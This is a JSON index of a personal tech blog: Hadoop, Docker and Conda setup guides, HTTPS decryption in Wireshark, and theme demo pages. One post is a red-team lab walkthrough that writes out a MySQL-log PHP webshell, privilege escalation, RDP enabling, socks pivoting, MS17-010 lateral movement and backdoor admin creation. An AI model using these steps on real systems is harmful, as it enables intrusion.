\u0026lt;name\u0026gt;yarn.nodemanager.vmem-check-enabled\u0026lt;/name\u0026gt; \u0026lt;value\u0026gt;false\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; 2.4 指定从节点（主节点执行） 编辑workers文件（Hadoop 3.x 用workers，2.x 用slaves），列出所有从节点主机名：\n1 2 3 4 5 6 7 vim $HADOOP_HOME/etc/hadoop/workers # 删除原有内容，添加以下两行（从节点主机名）： hadoop02 hadoop03 2.5 同步配置到所有从节点（主节点执行） 将主节点配置好的 Hadoop 目录同步到所有从节点，避免重复配置：\n1 2 3 4 5 6 7 8 9 10 11 12 13 # 同步到hadoop02 scp -r /usr/local/hadoop hadoop02:/usr/local/ # 同步到hadoop03 scp -r /usr/local/hadoop hadoop03:/usr/local/ # 同步环境变量配置（所有从节点执行source生效） scp /etc/profile hadoop02:/etc/ scp /etc/profile hadoop03:/etc/ 2.6 创建 Hadoop 数据目录（所有节点执行） 根据hdfs-site.xml中配置的路径，创建对应的目录：\n1 2 3 4 5 6 7 8 9 mkdir -p /usr/local/hadoop/tmp mkdir -p /usr/local/hadoop/dfs/name mkdir -p /usr/local/hadoop/dfs/data # 设置目录权限（避免权限不足） chown -R $USER:$USER /usr/local/hadoop/ 三、格式化 HDFS 与启动集群 3.1 格式化 NameNode（仅主节点执行） 注意：仅首次搭建时执行一次，重复执行会清空 HDFS 数据！\n1 hdfs namenode -format 执行成功后，会显示successfully formatted字样，同时在/usr/local/hadoop/dfs/name目录下生成初始化数据。\n3.2 启动 Hadoop 集群（主节点执行） Hadoop 提供两种启动方式：分步启动（便于排查问题）和一键启动（高效）。\n（1）分步启动（推荐新手） 1 2 3 4 5 6 7 8 9 10 11 # 启动HDFS（NameNode、DataNode） hdfs --daemon start namenode hdfs --daemon start datanode # 启动YARN（ResourceManager、NodeManager） yarn --daemon start resourcemanager yarn --daemon start nodemanager （2）一键启动（配置好 workers 后可用） 1 2 3 4 5 6 7 8 9 # 启动所有HDFS和YARN进程 start-dfs.sh start-yarn.sh # 或直接启动所有进程（包括HistoryServer） start-all.sh 3.3 验证集群状态 （1）查看进程（主节点执行） 1 jps 主节点应显示以下进程：\nNameNode\nResourceManager\nSecondaryNameNode（HDFS 辅助节点）\nJps\n从节点（hadoop02、hadoop03）应显示：\nDataNode\nNodeManager\nJps\n（2）Web UI 验证 Hadoop 提供 Web 界面查看集群状态，需确保浏览器能访问节点 IP：\nHDFS 状态：访问 http://hadoop01:9870（Hadoop 3.x 端口为 9870，2.x 为 50070），在「Datanodes」页面可看到 2 个从节点在线。\nYARN 状态：访问 http://hadoop01:8088，在「Nodes」页面可看到 2 个 NodeManager 节点。\n（3）执行 HDFS 命令验证 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 # 创建测试目录 hdfs dfs -mkdir /test # 上传本地文件到HDFS echo \u0026#34;hello hadoop\u0026#34; \u0026gt; test.txt hdfs dfs -put test.txt /test/ # 查看HDFS文件 hdfs dfs -ls /test/ hdfs dfs -cat /test/test.txt 若能正常执行上述命令，说明 HDFS 功能正常。\n四、常见问题与避坑指南 启动 DataNode 失败？\n原因：重复格式化 NameNode 导致 DataNode 的 clusterID 与 NameNode 不匹配。\n解决：删除所有节点的/usr/local/hadoop/dfs/data目录，重新格式化 NameNode（仅一次）。\nWeb UI 无法访问？\n原因：防火墙未关闭、IP 映射配置错误或端口被占用。\n解决：重新执行防火墙关闭命令，检查/etc/hosts配置，用netstat -tunlp | grep 9870查看端口是否被占用。\nYARN 启动后 NodeManager 不在线？\n原因：yarn-site.xml配置错误或内存不足。\n解决：检查yarn.resourcemanager.hostname是否为 hadoop01，添加yarn.nodemanager.vmem-check-enabled=false关闭内存检查。\n五、总结 本文详细讲解了 3 节点 Hadoop 集群的搭建流程，核心步骤可概括为：环境准备→配置免密→Hadoop 配置→同步节点→格式化启动→验证状态。对于新手而言，重点关注 IP 映射、SSH 免密、配置文件路径和权限这几个环节，即可避免大部分问题。\n后续可进一步学习 Hadoop 的分布式计算（MapReduce）、YARN 资源调度等功能，或搭建 HBase、Spark 等生态组件，逐步深入大数据技术领域。\n（注：文档部分内容由 AI 生成）\n","date":"2025-09-10T00:00:00Z","image":"https://Izumiy0.github.io/p/%E8%B6%85%E8%AF%A6%E7%BB%86-hadoop-%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA%E6%8C%87%E5%8D%97%E4%BB%8E%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87%E5%88%B0%E6%88%90%E5%8A%9F%E5%90%AF%E5%8A%A8/IIustraclones-Moebius_hu_ace7716a645bd973.jpg","permalink":"https://Izumiy0.github.io/p/%E8%B6%85%E8%AF%A6%E7%BB%86-hadoop-%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA%E6%8C%87%E5%8D%97%E4%BB%8E%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87%E5%88%B0%E6%88%90%E5%8A%9F%E5%90%AF%E5%8A%A8/","title":"超详细 Hadoop 集群搭建指南：从环境准备到成功启动"},{"content":"Ubuntu-service-2024安装docker Ubuntu官方下载 检查并卸载老版本 1 sudo apt-get remove docker docker-engine docker.io containerd runc 安装新版本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 # 常规更新起手 sudo apt update # 安装docker依赖 # Docker在Ubuntu上依赖一些软件包。执行以下命令来安装这些依赖 sudo apt-get install ca-certificates curl gnupg lsb-release # 添加Docker官方GPG密钥 curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add - # 添加Docker软件源 sudo add-apt-repository \u0026#34;deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable\u0026#34; # 安装docker引擎 sudo apt update sudo apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin # 配置用户组（可选,推荐） # 默认情况下，只有root用户和docker组的用户才能运行Docker命令。我们可以将当前用户添加到docker组，以避免每次使用Docker时都需要使用sudo。 # 将当前用户添加到 docker 组 sudo usermod -aG docker $USER # 退出当前会话并重新登录，或者使用以下命令立即生效 newgrp docker # 启动docker并且配置开机启动 sudo systemctl start docker sudo systemctl status docker sudo systemctl enable docker pip 安装 docker-compose 1 2 3 4 5 6 7 8 # 更新pip pip3 install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple #安装 docker-compose： pip3 install docker-compose -i https://pypi.tuna.tsinghua.edu.cn/simple # 检查安装 docker-compose version ","date":"2025-09-02T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85docker%E5%92%8Cdocker-compose/docker_hu_f306f7556d0df008.jpg","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85docker%E5%92%8Cdocker-compose/","title":"Ubuntu-service-2024安装docker和docker-compose"},{"content":"安装miniconda 1 2 3 4 5 6 7 8 9 10 11 12 # 下载 wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh # 加执行权限 chmod +x Miniconda3-latest-Linux-x86_64.sh # 运行 ./Miniconda3-latest-Linux-x86_64.sh # 建议conda init 选 yes # 然后退出终端, 重新连接,加载环境变量或者 source ~./bashrc # 注意这一步要在bash环境,不能是fish之类的 conda管理python虚拟环境 conda换源 1 2 3 4 5 6 7 8 9 10 11 12 13 # conda 换源 # 添加清华源 conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/ conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/ conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/r/ conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/msys2/ conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/conda-forge/ # 设置显示源地址 conda config --set show_channel_urls yes # 移除默认源（可选） conda config --remove channels defaults 管理虚拟环境 1 2 3 4 5 # 创建名为 MyEnvName 的 3.11 版本的python conda create -n MyEnvName python=3.11 # 删除虚拟环境 conda remove MyEnvName 虚拟环境中pip换源 1 2 3 4 5 6 7 # 激活虚拟环境 conda activate MyEnvName # 在bash环境中激活, 激活成功后可以启动fish等,也是激活状态 # pip 换源 pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple pip config set global.trusted-host pypi.tuna.tsinghua.edu.cn ","date":"2025-09-02T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85miniconda%E7%AE%A1%E7%90%86python%E7%8E%AF%E5%A2%83/conda_hu_f1a1128eada253f3.jpg","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85miniconda%E7%AE%A1%E7%90%86python%E7%8E%AF%E5%A2%83/","title":"Ubuntu-service-2024安装miniconda管理python环境"},{"content":"ATT\u0026amp;CK红队评估（红日靶场一） 靶场下载 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/\n0X01-主机发现 1 2 3 sudo arp-scan -l web服务器ip ：192.168.20.100 kali攻击机IP ：192.168.20.118 0X02-信息收集 1 sudo nmap -sV -p- 192.168.20.100 端口扫描结果 0X03-web渗透 访问web界面 这里直接是探针，试了下数据库连接 root：root 可以连接，函数上 eval函数 显示不支持\n目录扫描 1 2 gobuster dir -u http://192.168.20.100/ -w /usr/share/wordlists/dirbuster/commen.txt -x php,zip,txt,html 发现phpmyadmin，尝试 root：root 登录成功 发现yxcms但是数据库查到的密码无法登录后台，插入也不行（有大佬知道怎么操作这里请指点） sql语句写入木马 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 #查看写入权限 secure_file_prive 为null就是没有 SHOW GLOBAL VARIABLES LIKE \u0026#39;%secure%\u0026#39;; #查看是否有开启日志记录 会返回是否开启和日志文件路径 SHOW GLOBAL VARIABLES LIKE \u0026#39;%general%\u0026#39;; #开启日志记录 SET GLOBAL general_log = ON #设置指定日志文件，这样在sql语句中加入php代码就会被记录到test.php中实现shell写入 SET GLOBAL general_log_file = \u0026#39;C:/phpstudy/WWW/test.php\u0026#39;; #写入木马 select \u0026#39;\u0026lt;?php eval($_POST[\u0026#34;hack\u0026#34;]);?\u0026gt;\u0026#39;; #执行这条语句之后，日志会将select后的查询语句记录进日志，从而让日志变成一个一句话木马 #这里eval函数可以正常连接，不知道上面探针测试结果怎么回事 0X04-后渗透 cobalt strike上线 cs生成exe，蚁剑连接shell后上传运行 上线后发现adminnistrator权限，尝试提权为system，使用 systeminfo查看系统信息发现win7且补丁很少，使用 ms14_058 提权为 system 成功 1 2 3 4 5 6 7 8 9 10 #试着开启3389服务 reg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u0026#34; /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f reg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f net start termservice 0X05-内网 探测 cs自带的 右键-\u0026gt;浏览探测-\u0026gt;网络探测\u0026amp;端口扫描 （能看到存活3个主机，一个是已经上线的，都开了445端口，必须尝试 ms17-010 msf 联动轻松访问内网 msf 开启监听 CS 新建 foreign 监听器，IP和port与刚才 msf 使用的一致，然后选中目标机器 右键-\u0026gt;凭证提权(spawn)-\u0026gt;新建会话-\u0026gt;选择刚刚新建的监听器-\u0026gt;run msf 拿到会话 为了使除了msf的其它工具也能通过cs反弹过来的会话进入内网，msf建立需要建立socks反向代理 首先新建路由 run post/multi/manage/autoroute 查看路由 run autoroute -p 挂起会话，建立socks 1 2 3 4 5 6 7 8 background use auxiliary/server/socks_proxy set VERSION 4a set SRVHOST 127.0.0.1 show options #这里查看proxy的端口，后面修改/etc/proxychains4.conf 文件内容为对应的 IP:PORT exploit 修改proxychains4.conf 1 sudo vim /etc/proxychains4.conf #修改文件内容为 msf 设定的 IP:PORT 0X06-ms17-010击穿内网 1 2 3 4 5 6 net view arp #探测内网存活主机 use post/windows/gather/arp_scanner set RHOSTS 192.168.52.0/24 set SESSION 1 exploit 1 2 3 4 5 6 7 #查看域信息： net view #查看主域信息： net view /domain #开始横向渗透控制其它主机 #进行其它内网主机端口探测 sudo proxychains nmap -sS -sV -Pn 192.168.52.138 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 #发现445端口尝试永恒之蓝 search ms17-010 use auxiliary/admin/smb/ms17_010_command set COMMAND net user set RHOST 192.168.52.141 exploit #添加用户 net user hack qaz@123 /add #将添加的用户加入到管理员组 net localgroup administrators hack /add #试着开启3389服务 reg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u0026#34; /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f reg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f net start termservice ","date":"2024-09-02T00:00:00Z","image":"https://Izumiy0.github.io/p/attck-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA01/background_hu_c86aee492af4edec.jpg","permalink":"https://Izumiy0.github.io/p/attck-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA01/","title":"ATT\u0026CK (红日靶场01)"},{"content":"JAVA导出SSL证书 1 2 3 4 5 #首先有一个keystore文件,为私钥 keytool -list -keystore keystore #查看keystore密钥里面所有的证书 #导出证书为 kiss.p12 ,-srcalias tomcat为keystore存的密码,执行下面命令后会输入新的自定义的密码 keytool -importkeystore -srckeystore keystore -destkeystore kiss.p12 -deststoretype pkcs12 -srcalias tomcat SSL证书导入wireshark 1 2 # 1.在Wireshark中，进入菜单 Edit -\u0026gt; Preferences…。 # 2.展开 Protocols -\u0026gt; SSL，点击 Edit 按钮编辑 RSA key lists。 ","date":"2024-08-10T00:00:00Z","image":"https://Izumiy0.github.io/p/java%E5%AF%BC%E5%87%BAssl%E8%AF%81%E4%B9%A6%E8%A7%A3%E5%AF%86https%E6%B5%81%E9%87%8F/wireshark_hu_9f49d044a5517acf.png","permalink":"https://Izumiy0.github.io/p/java%E5%AF%BC%E5%87%BAssl%E8%AF%81%E4%B9%A6%E8%A7%A3%E5%AF%86https%E6%B5%81%E9%87%8F/","title":"JAVA导出SSL证书解密https流量"},{"content":"正文测试 而这些并不是完全重要，更加重要的问题是， 带着这些问题，我们来审视一下学生会退会。 既然如何， 对我个人而言，学生会退会不仅仅是一个重大的事件，还可能会改变我的人生。 我们不得不面对一个非常尴尬的事实，那就是， 可是，即使是这样，学生会退会的出现仍然代表了一定的意义。 学生会退会，发生了会如何，不发生又会如何。 经过上述讨论， 生活中，若学生会退会出现了，我们就不得不考虑它出现了的事实。 学生会退会，到底应该如何实现。 这样看来， 在这种困难的抉择下，本人思来想去，寝食难安。 对我个人而言，学生会退会不仅仅是一个重大的事件，还可能会改变我的人生。 就我个人来说，学生会退会对我的意义，不能不说非常重大。 莎士比亚曾经提到过，人的一生是短的，但如果卑劣地过这一生，就太长了。这似乎解答了我的疑惑。 莫扎特说过一句富有哲理的话，谁和我一样用功，谁就会和我一样成功。这启发了我， 对我个人而言，学生会退会不仅仅是一个重大的事件，还可能会改变我的人生。 学生会退会，到底应该如何实现。 一般来说， 从这个角度来看， 这种事实对本人来说意义重大，相信对这个世界也是有一定意义的。 在这种困难的抉择下，本人思来想去，寝食难安。 了解清楚学生会退会到底是一种怎么样的存在，是解决一切问题的关键。 一般来说， 生活中，若学生会退会出现了，我们就不得不考虑它出现了的事实。 问题的关键究竟为何？ 而这些并不是完全重要，更加重要的问题是。\n奥斯特洛夫斯基曾经说过，共同的事业，共同的斗争，可以使人们产生忍受一切的力量。　带着这句话，我们还要更加慎重的审视这个问题： 一般来讲，我们都必须务必慎重的考虑考虑。 既然如此， 这种事实对本人来说意义重大，相信对这个世界也是有一定意义的。 带着这些问题，我们来审视一下学生会退会。 我认为， 我认为， 在这种困难的抉择下，本人思来想去，寝食难安。 问题的关键究竟为何？ 每个人都不得不面对这些问题。 在面对这种问题时， 要想清楚，学生会退会，到底是一种怎么样的存在。 我认为， 既然如此， 每个人都不得不面对这些问题。 在面对这种问题时， 那么， 我认为， 学生会退会因何而发生。\n引用 思念是最暖的忧伤像一双翅膀\n让我停不了飞不远在过往游荡\n不告而别的你 就算为了我着想\n这么沉痛的呵护 我怎么能翱翔\n最暖的憂傷 - 田馥甄\n图片 1 2 3 ![Photo by Florian Klauer on Unsplash](florian-klauer-nptLmg6jqDo-unsplash.jpg) ![Photo by Luca Bravo on Unsplash](luca-bravo-alS7ewQ41M8-unsplash.jpg) ![Photo by Helena Hertz on Unsplash](helena-hertz-wWZzXlDpMog-unsplash.jpg) ![Photo by Hudai Gayiran on Unsplash](hudai-gayiran-3Od_VKcDEAA-unsplash.jpg) 相册语法来自 Typlog\n","date":"2020-09-09T00:00:00Z","image":"https://Izumiy0.github.io/p/test-chinese/helena-hertz-wWZzXlDpMog-unsplash_hu_2307260c751d0e0b.jpg","permalink":"https://Izumiy0.github.io/p/test-chinese/","title":"Chinese Test"},{"content":"This article offers a sample of basic Markdown syntax that can be used in Hugo content files, also it shows whether basic HTML elements are decorated with CSS in a Hugo theme.\nHeadings The following HTML \u0026lt;h1\u0026gt;—\u0026lt;h6\u0026gt; elements represent six levels of section headings. \u0026lt;h1\u0026gt; is the highest section level while \u0026lt;h6\u0026gt; is the lowest.\nH1 H2 H3 H4 H5 H6 Paragraph Xerum, quo qui aut unt expliquam qui dolut labo. Aque venitatiusda cum, voluptionse latur sitiae dolessi aut parist aut dollo enim qui voluptate ma dolestendit peritin re plis aut quas inctum laceat est volestemque commosa as cus endigna tectur, offic to cor sequas etum rerum idem sintibus eiur? Quianimin porecus evelectur, cum que nis nust voloribus ratem aut omnimi, sitatur? Quiatem. Nam, omnis sum am facea corem alique molestrunt et eos evelece arcillit ut aut eos eos nus, sin conecerem erum fuga. Ri oditatquam, ad quibus unda veliamenimin cusam et facea ipsamus es exerum sitate dolores editium rerore eost, temped molorro ratiae volorro te reribus dolorer sperchicium faceata tiustia prat.\nItatur? Quiatae cullecum rem ent aut odis in re eossequodi nonsequ idebis ne sapicia is sinveli squiatum, core et que aut hariosam ex eat.\nBlockquotes The blockquote element represents content that is quoted from another source, optionally with a citation which must be within a footer or cite element, and optionally with in-line changes such as annotations and abbreviations.\nBlockquote without attribution Tiam, ad mint andaepu dandae nostion secatur sequo quae. Note that you can use Markdown syntax within a blockquote.\nBlockquote with attribution Don\u0026rsquo;t communicate by sharing memory, share memory by communicating.\n— Rob Pike1\nTables Tables aren\u0026rsquo;t part of the core Markdown spec, but Hugo supports supports them out-of-the-box.\nName Age Bob 27 Alice 23 Inline Markdown within tables Italics Bold Code italics bold code A B C D E F Lorem ipsum dolor sit amet, consectetur adipiscing elit. Phasellus ultricies, sapien non euismod aliquam, dui ligula tincidunt odio, at accumsan nulla sapien eget ex. Proin eleifend dictum ipsum, non euismod ipsum pulvinar et. Vivamus sollicitudin, quam in pulvinar aliquam, metus elit pretium purus Proin sit amet velit nec enim imperdiet vehicula. Ut bibendum vestibulum quam, eu egestas turpis gravida nec Sed scelerisque nec turpis vel viverra. Vivamus vitae pretium sapien Code Blocks Code block with backticks 1 2 3 4 5 6 7 8 9 10 \u0026lt;!doctype html\u0026gt; \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;Example HTML5 Document\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;p\u0026gt;Test\u0026lt;/p\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Code block indented with four spaces \u0026lt;!doctype html\u0026gt; \u0026lt;html lang=\u0026quot;en\u0026quot;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026quot;utf-8\u0026quot;\u0026gt; \u0026lt;title\u0026gt;Example HTML5 Document\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;p\u0026gt;Test\u0026lt;/p\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Code block with Hugo\u0026rsquo;s internal highlight shortcode 1 2 3 4 5 6 7 8 9 10 \u0026lt;!doctype html\u0026gt; \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;Example HTML5 Document\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;p\u0026gt;Test\u0026lt;/p\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Diff code block 1 2 3 4 5 [dependencies.bevy] git = \u0026#34;https://github.com/bevyengine/bevy\u0026#34; rev = \u0026#34;11f52b8c72fc3a568e8bb4a4cd1f3eb025ac2e13\u0026#34; - features = [\u0026#34;dynamic\u0026#34;] + features = [\u0026#34;jpeg\u0026#34;, \u0026#34;dynamic\u0026#34;] List Types Ordered List First item Second item Third item Unordered List List item Another item And another item Nested list Fruit Apple Orange Banana Dairy Milk Cheese Other Elements — abbr, sub, sup, kbd, mark GIF is a bitmap image format.\nH2O\nXn + Yn = Zn\nPress CTRL + ALT + Delete to end the session.\nMost salamanders are nocturnal, and hunt for insects, worms, and other small creatures.\nHyperlinked image The above quote is excerpted from Rob Pike\u0026rsquo;s talk during Gopherfest, November 18, 2015.\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","date":"2019-03-11T00:00:00Z","image":"https://Izumiy0.github.io/p/markdown-syntax-guide/pawel-czerwinski-8uZPynIu-rQ-unsplash_hu_e95a4276bf860a84.jpg","permalink":"https://Izumiy0.github.io/p/markdown-syntax-guide/","title":"Markdown Syntax Guide"},{"content":"Lorem est tota propiore conpellat pectoribus de pectora summo.\nRedit teque digerit hominumque toris verebor lumina non cervice subde tollit usus habet Arctonque, furores quas nec ferunt. Quoque montibus nunc caluere tempus inhospita parcite confusaque translucet patri vestro qui optatis lumine cognoscere flos nubis! Fronde ipsamque patulos Dryopen deorum.\nExierant elisi ambit vivere dedere Duce pollice Eris modo Spargitque ferrea quos palude Rursus nulli murmur; hastile inridet ut ab gravi sententia! Nomine potitus silentia flumen, sustinet placuit petis in dilapsa erat sunt. Atria tractus malis.\nComas hunc haec pietate fetum procerum dixit Post torum vates letum Tiresia Flumen querellas Arcanaque montibus omnes Quidem et Vagus elidunt The Van de Graaf Canon\nMane refeci capiebant unda mulcebat Victa caducifer, malo vulnere contra dicere aurato, ludit regale, voca! Retorsit colit est profanae esse virescere furit nec; iaculi matertera et visa est, viribus. Divesque creatis, tecta novat collumque vulnus est, parvas. Faces illo pepulere tempus adest. Tendit flamma, ab opes virum sustinet, sidus sequendo urbis.\nIubar proles corpore raptos vero auctor imperium; sed et huic: manus caeli Lelegas tu lux. Verbis obstitit intus oblectamina fixis linguisque ausus sperare Echionides cornuaque tenent clausit possit. Omnia putatur. Praeteritae refert ausus; ferebant e primus lora nutat, vici quae mea ipse. Et iter nil spectatae vulnus haerentia iuste et exercebat, sui et.\nEurytus Hector, materna ipsumque ut Politen, nec, nate, ignari, vernum cohaesit sequitur. Vel mitis temploque vocatus, inque alis, oculos nomen non silvis corpore coniunx ne displicet illa. Crescunt non unus, vidit visa quantum inmiti flumina mortis facto sic: undique a alios vincula sunt iactata abdita! Suspenderat ego fuit tendit: luna, ante urbem Propoetides parte.\n","date":"2019-03-09T00:00:00Z","image":"https://Izumiy0.github.io/p/placeholder-text/matt-le-SJSpo9hQf7s-unsplash_hu_c1ca39d792aee4ab.jpg","permalink":"https://Izumiy0.github.io/p/placeholder-text/","title":"Placeholder Text"},{"content":"Mathematical notation in a Hugo project can be enabled by using third party JavaScript libraries.\nIn this example we will be using KaTeX\nCreate a partial under /layouts/partials/math.html Within this partial reference the Auto-render Extension or host these scripts locally. Include the partial in your templates like so: 1 2 3 {{ if or .Params.math .Site.Params.math }} {{ partial \u0026#34;math.html\u0026#34; . }} {{ end }} To enable KaTeX globally set the parameter math to true in a project\u0026rsquo;s configuration To enable KaTeX on a per page basis include the parameter math: true in content files Note: Use the online reference of Supported TeX Functions\nExamples Inline math: $\\varphi = \\dfrac{1+\\sqrt5}{2}= 1.6180339887…$\nBlock math: $$ \\varphi = 1+\\frac{1} {1+\\frac{1} {1+\\frac{1} {1+\\cdots} } } $$","date":"2019-03-08T00:00:00Z","permalink":"https://Izumiy0.github.io/p/math-typesetting/","title":"Math Typesetting"},{"content":"Emoji can be enabled in a Hugo project in a number of ways.\nThe emojify function can be called directly in templates or Inline Shortcodes.\nTo enable emoji globally, set enableEmoji to true in your site\u0026rsquo;s configuration and then you can type emoji shorthand codes directly in content files; e.g.\n🙈 :see_no_evil: 🙉 :hear_no_evil: 🙊 :speak_no_evil:\nThe Emoji cheat sheet is a useful reference for emoji shorthand codes.\nN.B. The above steps enable Unicode Standard emoji characters and sequences in Hugo, however the rendering of these glyphs depends on the browser and the platform. To style the emoji you can either use a third party emoji font or a font stack; e.g.\n1 2 3 .emoji { font-family: Apple Color Emoji, Segoe UI Emoji, NotoColorEmoji, Segoe UI Symbol, Android Emoji, EmojiSymbols; } ","date":"2019-03-05T00:00:00Z","image":"https://Izumiy0.github.io/p/emoji-support/the-creative-exchange-d2zvqp3fpro-unsplash_hu_27b8954607cdb515.jpg","permalink":"https://Izumiy0.github.io/p/emoji-support/","title":"Emoji Support"},{"content":"遇到的问题及解决方案 重启后没有IP了 1 2 3 4 5 6 7 # 配置静态IP # 使用dhclient # 安装 sudo apt install isc-dhcp-client # 使用 sudo hdclient ","date":"0001-01-01T00:00:00Z","permalink":"https://Izumiy0.github.io/p/","title":""}]